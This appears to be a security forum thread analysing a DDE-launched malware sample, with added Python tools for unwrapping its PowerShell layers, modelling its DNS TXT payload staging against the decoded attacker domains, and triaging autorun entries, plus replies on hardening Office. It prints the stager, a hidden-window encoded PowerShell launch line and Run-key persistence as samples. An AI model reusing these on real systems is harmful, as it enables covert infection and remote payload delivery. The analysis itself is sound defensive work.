[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADAALgBzAHAAYQBjAGUA')) -> ns0.space
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADAALgB3AGUAYgBzAGkAdABlAA==')) -> ns0.website
...
Hope it will help somebody. :)
 
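The same Base64 -> GZip -> IEX unwrapping that the post performs by hand in PowerShell, written here in Python as an added example (it is not code from the post or from the sample), so that every layer can be peeled statically and nothing is ever executed. It handles the two encodings the sample mixes, GZipStream blobs (the 'H4sI...' literals) and UTF-16LE strings (what [Text.Encoding]::Unicode.GetBytes and powershell -e produce), and recurses into each decoded layer. The three-layer script it runs on is constructed to mirror the stager's shape; only the 'ns0.pw' literal is taken from the post.

```python
"""Static unwrapper for PowerShell stagers of the Base64 -> GZip -> IEX kind.

Added example, not code from the post: it walks every Base64 literal a
script carries (FromBase64String('...') calls and -e/-EncodedCommand
arguments), gunzips GZip blobs, decodes UTF-16LE blobs, and recurses into
whatever comes out, so every layer is recovered without running IEX.
The sample script built by build_sample() is constructed; only the
'ns0.pw' literal is taken from the post.
"""
import base64
import gzip
import re
import zlib
from typing import List, Tuple

# FromBase64String('....') literals, or an -e/-enc/-EncodedCommand argument
B64_LITERAL = re.compile(
    r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)"
    r"|-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})",
    re.I,
)
GZIP_MAGIC = b"\x1f\x8b"  # the bytes that 'H4sI' decodes to


def decode_blob(b64: str) -> Tuple[str, str]:
    """Classify and decode one Base64 literal.

    Returns ('gzip', script) for a GZipStream-wrapped script, ('utf16', text)
    for a UTF-16LE string (what [Text.Encoding]::Unicode and -e use), or
    ('raw', text) when neither fits.
    """
    raw = base64.b64decode(b64)
    if raw.startswith(GZIP_MAGIC):
        return "gzip", gzip.decompress(raw).decode("utf-8", "replace")
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        # every odd byte is NUL: heuristic for ASCII text stored as UTF-16LE
        return "utf16", raw.decode("utf-16-le")
    return "raw", raw.decode("latin-1")


def unwrap(script: str, max_depth: int = 8) -> List[Tuple[int, str, str]]:
    """Return (depth, kind, decoded) for every literal found, recursing into
    decoded text.  Undecodable literals are skipped rather than fatal."""
    stages: List[Tuple[int, str, str]] = []

    def walk(text: str, depth: int) -> None:
        if depth > max_depth:
            return
        for m in B64_LITERAL.finditer(text):
            literal = m.group(1) or m.group(2)
            try:
                kind, decoded = decode_blob(literal)
            except (ValueError, OSError, EOFError, zlib.error):
                continue
            stages.append((depth, kind, decoded))
            if kind != "raw":
                walk(decoded, depth + 1)

    walk(script, 0)
    return stages


def build_sample() -> str:
    """Constructed three-layer stager (NOT the real EDGAR_Rules_2017 payload)."""
    stage2 = "[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADAALgBwAHcA'))"
    stage2_b64 = base64.b64encode(stage2.encode("utf-16-le")).decode("ascii")
    stage1 = (
        "New-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' "
        f"-Name 'IE' -Value \"powershell.exe -ep bypass -noni -w hidden -e {stage2_b64}\""
    )
    stage1_b64 = base64.b64encode(gzip.compress(stage1.encode("utf-8"))).decode("ascii")
    return (
        f"$data=[System.Convert]::FromBase64String('{stage1_b64}');"
        "$ms=New-Object System.IO.MemoryStream;$ms.Write($data,0,$data.Length);$ms.Seek(0,0)|Out-Null;"
        "$cs=New-Object System.IO.Compression.GZipStream($ms,[System.IO.Compression.CompressionMode]::Decompress);"
        "$sr=New-Object System.IO.StreamReader($cs);IEX($sr.ReadToEnd())"
    )


if __name__ == "__main__":
    for depth, kind, text in unwrap(build_sample()):
        print(f"{'  ' * depth}[{kind}] {text[:90]}")
```

The UTF-16 test is a heuristic (every odd byte NUL), which is right for the ASCII-only strings this sample stores but will misclassify binary blobs that happen to have that shape; for a real case, dump each recovered layer to a file and read it before deciding anything, and remember that other families wrap with Deflate, XOR or AES instead of GZip, so the classifier needs a branch per wrapper you meet.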
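The stage-2 script above fetches its next stage over DNS: it resolves <first 10 hex digits of MD5(BIOS serial)>.stage.<index>.<domain> for one of the ns0.pw/ns0.site/... domains, reads the TXT records of that name as one chunk (quotes, newlines and spaces stripped), and accepts the chunk only when the first 8 hex digits of its MD5, taken as an integer, equal the A record for the same name taken as an integer; an A record of 0.0.0.0 ends the transfer, and the joined chunks are Base64 -> GZip decoded and passed to iex. Added example, not code from the post or the sample: a Python model of that protocol against a constructed in-memory zone, so the chunk/checksum scheme can be exercised offline. The BIOS serial, the payload text and the chunk size are assumptions; the domains are those decoded in the post.

```python
"""Offline model of the DNS TXT staging protocol decoded from the sample.

Added example, not code from the post or from the malware: it reimplements
the Download-Big-TXT logic in Python against a constructed in-memory
"zone" so the chunk/checksum scheme can be studied without real lookups.
Assumptions: the BIOS serial, the payload text and the chunk size; the
domains are the ones decoded in the post.
"""
import base64
import gzip
import hashlib
from typing import Callable, Dict, List, Optional, Tuple

Resolver = Callable[[str, str], List[str]]  # (qname, "A" | "TXT") -> rdata strings


def bot_id(bios_serial: str) -> str:
    """MD5(BIOS serial) in upper-case hex, first 10 chars: the per-host label."""
    return hashlib.md5(bios_serial.encode("utf-8")).hexdigest().upper()[:10]


def checksum_ip(chunk: str) -> str:
    """The A record the sample expects for a TXT chunk.

    The sample takes the first 8 hex digits of MD5(chunk) as an integer and
    compares it with the A record as an integer (a*2^24 + b*2^16 + c*2^8 + d);
    both are rendered in binary without leading zeros, so the test is plain
    integer equality, i.e. the first four digest bytes as a dotted quad.
    """
    digest = hashlib.md5(chunk.encode("utf-8")).digest()
    return ".".join(str(b) for b in digest[:4])


def clean_txt(strings: List[str]) -> str:
    """Join the TXT strings and drop quotes, newlines and spaces, as the sample does."""
    return "".join(strings).replace('"', "").replace("\n", "").replace(" ", "")


def fetch_staged_payload(resolve: Resolver, bios_serial: str, domains: List[str],
                         label: str = "stage", max_chunks: int = 100) -> Optional[bytes]:
    """Reassemble <id>.<label>.<index>.<domain> chunks and gunzip the result.

    Returns None where the sample returns 0 (no A record, no TXT, or a chunk
    whose checksum matches on no domain).  The sample picks a domain at random
    and retries forever on mismatch; max_chunks and the per-index rotation
    over all domains are bounds added here (assumptions).
    """
    ident = bot_id(bios_serial)
    chunks: List[str] = []
    index = 0
    while index < max_chunks:
        for domain in domains:
            qname = f"{ident}.{label}.{index}.{domain}"
            a_records = resolve(qname, "A")
            if not a_records:
                return None
            if a_records[0] == "0.0.0.0":          # terminator: no more chunks
                return gzip.decompress(base64.b64decode("".join(chunks)))
            chunk = clean_txt(resolve(qname, "TXT"))
            if not chunk:
                return None
            if checksum_ip(chunk) == a_records[0]:
                chunks.append(chunk)
                break
        else:
            return None                           # checksum failed on every domain
        index += 1
    return None


def build_zone(payload: bytes, bios_serial: str, domains: List[str],
               chunk_size: int = 32, label: str = "stage") -> Dict[Tuple[str, str], List[str]]:
    """Constructed server side: split base64(gzip(payload)) into TXT chunks,
    publish each chunk's checksum as the A record, and terminate with 0.0.0.0."""
    ident = bot_id(bios_serial)
    encoded = base64.b64encode(gzip.compress(payload)).decode("ascii")
    chunks = [encoded[i:i + chunk_size] for i in range(0, len(encoded), chunk_size)]
    zone: Dict[Tuple[str, str], List[str]] = {}
    for domain in domains:                        # every domain serves identical records
        for index, chunk in enumerate(chunks):
            qname = f"{ident}.{label}.{index}.{domain}"
            zone[(qname, "A")] = [checksum_ip(chunk)]
            half = len(chunk) // 2                # two TXT strings, joined by the client
            zone[(qname, "TXT")] = [chunk[:half], chunk[half:]]
        zone[(f"{ident}.{label}.{len(chunks)}.{domain}", "A")] = ["0.0.0.0"]
    return zone


DOMAINS = ["ns0.pw", "ns0.site", "ns0.space", "ns0.website"]  # decoded in the post
BIOS_SERIAL = "VMware-56 4d 00 00 11 22 33 44"                  # assumption


def demo(tamper: bool = False) -> Optional[bytes]:
    """Run the client against the constructed zone; tamper=True corrupts chunk 1."""
    payload = b"Write-Host 'constructed stage 2'"
    zone = build_zone(payload, BIOS_SERIAL, DOMAINS)
    if tamper:
        ident = bot_id(BIOS_SERIAL)
        for domain in DOMAINS:
            zone[(f"{ident}.stage.1.{domain}", "TXT")] = ["tampered"]
    return fetch_staged_payload(lambda q, t: zone.get((q, t), []), BIOS_SERIAL, DOMAINS)


if __name__ == "__main__":
    print(demo())
    print(demo(tamper=True))
```

The A-record checksum is a transport integrity check, not authentication: whoever controls the zone computes it trivially. For detection, the query shape is the useful signal, a 10-hex-digit first label, a fixed 'stage' label and an incrementing index across many TXT queries to one of a short list of domains.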

vemn

Level 6
Verified
Malware Hunter
Well-known
Feb 11, 2017
264
Hi @Andy Ful, thank you so much for dissecting this new attack leveraging MS DDE.

Just wondering, from an... ehemmm... IT security engineer, what will be my recommendation to my boss on how to protect against this?
- It still comes down to PowerShell, and disabling it should be sufficient?
- Or disabling DDE (though I'm not sure what the implications will be)
- Or creating a more granular HIPS or Access Control rule (whatever you call it on whichever product) to detect things like Winword.exe running another exe (cscript/powershell/cmd/wscript).

What would be the effective way to stop this? Can anyone advise, please?
 

Andy Ful

Here are some good references on how to harden Microsoft Office:
Security policies and settings in the 2007 Office system
Office Customization Tool in Office 2010
Group Policy Administrative Template files (ADMX, ADML) and Office Customization Tool (OCT) files for Office 2013
Generally, untrusted Office documents should not be allowed to use VBA macros or to spawn processes other than Office applications, so they should run in a kind of sandbox. Also, there should be a secured share center for trusted Office documents, which could be opened outside this sandbox.
In Office 2010+ the user can open untrusted documents in Protected View (a sandbox). Protected View can be configured to suit the security and usability requirements.
Also, I think that something like Bouncer or MemProtect (Excubits software), ReHips or Sandboxie (paid) could be used to protect Office applications.
For viewing PDF documents I can recommend STDU Viewer.
.
In Windows 10, the user can simply use the free Universal Applications (Windows Store): Word Mobile, PowerPoint Mobile and Excel Mobile for viewing documents (sandbox = AppContainer), and Edge (sandbox = AppContainer) + the Office Online add-on for editing documents (Edge allows viewing PDF documents, too).
.
See also: Q&A - Need your input for NEW zero config application sandbox
 
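On the detection side of vemn's question, the first post already lists where this sample persists: Run/RunOnce/RunServices values named 'IE', a Winlogon value, a Services\VxD value, the vbsfile\shell\open\command handler, a scheduled task named 'IE' and a WMI CommandLineEventConsumer, all launching 'powershell.exe -ep bypass -noni -w hidden -e <Base64>', with the real stage stashed in an 'IE' value under HKCU:\Control Panel\Desktop. Added example, not the post's code: a Python triage pass over (location, name, value) rows as exported from Autoruns or a registry dump, which decodes the -e argument and scores each entry by its launch flags and by the strings the decoded stager contains. The rows it runs on are constructed; the stager text inside them is the one decoded in the post.

```python
"""Triage of autorun entries for the registry-resident PowerShell stager
decoded in the post ('powershell.exe -ep bypass -noni -w hidden -e <Base64>'
reading its stage back from HKCU:\\Control Panel\\Desktop).

Added example, not the post's code: give it (location, name, value) rows as
exported from Autoruns or a registry dump; it decodes the -e argument and
reports why an entry looks like this stager.  SAMPLE_ROWS is constructed;
the stager text inside it is the one decoded in the post.
"""
import base64
import re
from typing import List, NamedTuple, Optional, Sequence, Tuple

ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# launch flags the sample uses to stay out of sight
HIDING_FLAGS = (
    ("-w hidden", "hidden window"),
    ("-noni", "non-interactive"),
    ("-ep bypass", "execution policy bypass"),
)
# strings present in the decoded stager from the post (matched lower-case)
PAYLOAD_MARKERS = (
    ("iex", "invokes decoded text (IEX)"),
    ("control panel\\desktop", "reads its stage from HKCU:\\Control Panel\\Desktop"),
    ("system.threading.mutex", "single-instance mutex"),
    ("frombase64string", "another Base64 layer inside the encoded command"),
)


class Finding(NamedTuple):
    location: str
    name: str
    score: int
    reasons: List[str]
    decoded: str


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE text behind a -e/-enc argument, or '' if none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def triage_entry(location: str, name: str, value: str) -> Optional[Finding]:
    """Score one autorun value; None when it does not launch PowerShell suspiciously."""
    lowered = value.lower()
    if "powershell" not in lowered:
        return None
    score, reasons = 0, []
    for flag, why in HIDING_FLAGS:
        if flag in lowered:
            score += 1
            reasons.append(why)
    decoded = decode_encoded_command(value)
    if decoded:
        score += 1
        reasons.append("-EncodedCommand present and decodable")
        for marker, why in PAYLOAD_MARKERS:
            if marker in decoded.lower():
                score += 2
                reasons.append(why)
    if score == 0:
        return None
    return Finding(location, name, score, reasons, decoded)


def triage(rows: Sequence[Tuple[str, str, str]]) -> List[Finding]:
    """Triage every row and return findings, highest score first."""
    findings = [f for f in (triage_entry(*row) for row in rows) if f is not None]
    return sorted(findings, key=lambda f: f.score, reverse=True)


# --- constructed sample input; STAGER is the stager code decoded in the post ---
STAGER = (
    "$b64=(Get-ItemProperty -Path 'HKCU:\\Control Panel\\Desktop').IE;"
    "$stCode=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($b64));"
    "[System.Threading.Mutex]$m;[bool]$mtmp=$false;"
    "$m=New-Object System.Threading.Mutex($true, [string]1823821749, [ref] $mtmp);"
    "if(!$mtmp){exit;}IEX $stCode;"
)
STAGER_B64 = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")
SAMPLE_ROWS = [
    ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "SecurityHealth",
     "%windir%\\system32\\SecurityHealthSystray.exe"),
    ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Backup",
     "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"),
    ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "IE",
     f"powershell.exe -ep bypass -noni -w hidden -e {STAGER_B64}"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f"{f.score:2d}  {f.location}\\{f.name}")
        for reason in f.reasons:
            print(f"      - {reason}")
```

The same scoring applies unchanged to the Argument of a scheduled task action or the CommandLineTemplate of a WMI consumer, which is where this sample also plants the identical command line. The score is a triage aid, not a verdict: a plain '-File' launcher with none of the flags correctly scores zero, and a stager that pulls its body from a file or an ADS instead of a registry value needs its own markers.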

Andy Ful

There are also some other solutions (default deny) like NVT Exe Radar Pro, AppGuard, Comodo Firewall and Hard_Configurator. But they are aimed at securing all applications, not Office applications in particular.
Edit.
Post edited on NVT ERP.
 

509322

Pure Anti-exe solutions can mitigate Office documents infections, but cannot stop the macros.
There are also some other solutions (default deny) like AppGuard, Comodo Firewall, Hard_Configurator. But, they are directed to secure all applications, not particularly Office applications.

Unless a home user has a definite need to use Office, they shouldn't. There are better alternatives for what the typical home user needs from a productivity suite and by not using Office it greatly reduces security risks.

If you don't want to accidentally shoot yourself, then don't pick up the gun - ever.
 

Andy Ful

Unless a home user has a definite need to use Office, they shouldn't. There are better alternatives for what the typical home user needs from a productivity suite and by not using Office it greatly reduces security risks.

If you don't want to accidentally shoot yourself, then don't pick up the gun - ever.
That is very true for home users. :)
Companies have more problems, because often they cannot change the Office applications.
I slightly edited my previous post.
 
